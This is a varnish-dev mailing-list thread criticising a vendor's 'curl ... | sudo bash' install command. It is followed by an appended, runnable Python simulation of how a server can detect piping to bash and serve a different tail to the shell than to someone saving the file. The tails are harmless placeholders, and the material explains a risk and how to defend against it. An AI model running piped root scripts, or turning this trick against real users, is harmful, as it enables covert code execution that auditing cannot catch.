On Wed, Jun 17, 2020 at 3:05 PM Geoff Simmons <ge...@uplex.de> wrote:
>
> On 6/17/20 16:56, Nils Goroll wrote:
> > On 17/06/2020 10:00, Emilio Fernandes wrote:
> >> 1.1) curl -s
> >> https://packagecloud.io/install/repositories/varnishcache/varnish-weekly/script.deb.sh
> >> | sudo bash
> >
> > The fact that, with my listmaster head on, I have not censored this posting,
> > does not, *by any stretch*, imply any form of endorsement of this practice.
> >
> > My personal 2 cents: DO NOT DO THIS. EVER. AND DO NOT POST THIS AS ADVICE
> > TO OTHERS.
> >
> > Thank you
>
> +1
>
> To point fingers at the right people, this is what the packagecloud docs
> tell you to do.
>
> But ... the *packagecloud docs* tell you to do that!
>
> If I could have them arrested for it, I'd think about it.
>
> Piping the response from a web site into a root shell is stark, raving
> madness.
Dudes, chill out and live with your time.

It's not like attackers taking control of packagecloud could send a
different payload depending on whether you curl to disk to audit the
script or yolo curl to pipe.

https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

We've known for years that it isn't possible.

Dridi

_______________________________________________
varnish-dev mailing list
varnish-dev@varnish-cache.org
https://www.varnish-cache.org/lists/mailman/listinfo/varnish-dev
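Added example, not part of the thread and not packagecloud's or Varnish's code: the server-side trick behind the article Dridi links to, simulated end to end so it runs offline. The idea is that a script piped into bash stalls once bash reaches a `sleep`: bash stops reading stdin, curl fills the 64 KiB pipe and then stops reading the socket, and the server's sends block. A server that pads the script and watches for that stall can serve one tail to an auditor who saved the file and a different tail to the shell. Assumptions here are mine: the script head carries a `sleep`, SO_SNDBUF/SO_RCVBUF are pinned small so the stall shows up on loopback within a second, the client is a simulated curl (a "file" client that drains the socket and a "pipe" client that reads one chunk and then pauses) rather than real curl and bash, and both tails are harmless `echo` placeholders.

```python
"""Simulated server-side detection of `curl ... | bash` (added example).

Assumptions (not from the thread): `sleep` in the script head, pinned socket
buffers, a simulated client, and harmless placeholder tails."""
import socket
import threading
import time

# Constructed sample script. Once bash reaches `sleep`, it stops reading its
# stdin; curl keeps writing until the pipe is full, then stops reading the
# socket, and the server's sends start to stall.
SCRIPT_HEAD = b"#!/bin/sh\necho 'installing...'\nsleep 3\n"
PADDING = b"# padding\n" * 400_000   # ~4 MiB; must exceed socket buffers + pipe
BENIGN_TAIL = b"echo 'benign tail: the script an auditor would read'\n"
EVIL_TAIL = b"echo 'PLACEHOLDER: attacker-chosen tail, only ever sent to a shell'\n"
HTTP_HEAD = (b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n"
             b"Connection: close\r\n\r\n")
BUF = 64 * 1024   # pinned SO_SNDBUF/SO_RCVBUF: disables autotuning, keeps the demo fast


def _push(conn, data, deadline):
    """Send as much of `data` as the peer accepts before `deadline`.
    Returns the byte count handed to the kernel; short means the peer stalled."""
    view, sent = memoryview(data), 0
    while sent < len(view):
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            break
        conn.settimeout(remaining)
        try:
            sent += conn.send(view[sent:])
        except socket.timeout:
            break
    return sent


def handle(conn, probe_seconds=1.0):
    """Serve one request; return 'shell' if the client stalled, else 'file'.
    A slow or lossy link can also produce a 'shell' verdict: this is a timing
    heuristic, not a certainty."""
    conn.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, BUF)
    conn.recv(4096)                                   # request line + headers, ignored
    conn.sendall(HTTP_HEAD + SCRIPT_HEAD)
    sent = _push(conn, PADDING, time.monotonic() + probe_seconds)
    verdict = "shell" if sent < len(PADDING) else "file"
    conn.settimeout(None)
    conn.sendall(PADDING[sent:])                      # finish the harmless padding
    conn.sendall(EVIL_TAIL if verdict == "shell" else BENIGN_TAIL)
    conn.close()
    return verdict


def fetch(port, behaviour, stall_seconds=2.5):
    """Simulated curl. 'file' drains the socket as fast as it can; 'pipe'
    reads one chunk and then stops reading for a while, which is what the
    server sees once bash is blocked in `sleep` behind a full pipe."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, BUF)   # must precede connect
    s.connect(("127.0.0.1", port))
    s.sendall(b"GET /install.sh HTTP/1.0\r\n\r\n")
    chunks = [s.recv(4096)]
    if behaviour == "pipe":
        time.sleep(stall_seconds)
    while chunk := s.recv(65536):
        chunks.append(chunk)
    s.close()
    return b"".join(chunks)


def run_probe(behaviour, probe_seconds=1.0):
    """One-shot server on an ephemeral port plus one simulated client.
    Returns (bytes the client received, verdict the server reached)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    verdict = []

    def serve():
        conn, _ = listener.accept()
        verdict.append(handle(conn, probe_seconds))

    t = threading.Thread(target=serve)
    t.start()
    body = fetch(listener.getsockname()[1], behaviour)
    t.join()
    listener.close()
    return body, verdict[0]


if __name__ == "__main__":
    for behaviour in ("file", "pipe"):
        body, verdict = run_probe(behaviour)
        tail = "evil" if EVIL_TAIL in body else "benign"
        print(f"client={behaviour:4s} server verdict={verdict:5s} tail received={tail}")
```

Run stand-alone it prints the two outcomes: the draining client gets the benign tail, the pausing client gets the other one, and the bytes differ only after the padding, so a quick look at the head of the file reveals nothing. The practical consequence is the one Nils and Geoff state: fetch the script to a file, read that file, and run that same file; auditing one download and then piping a second one executes bytes nobody looked at.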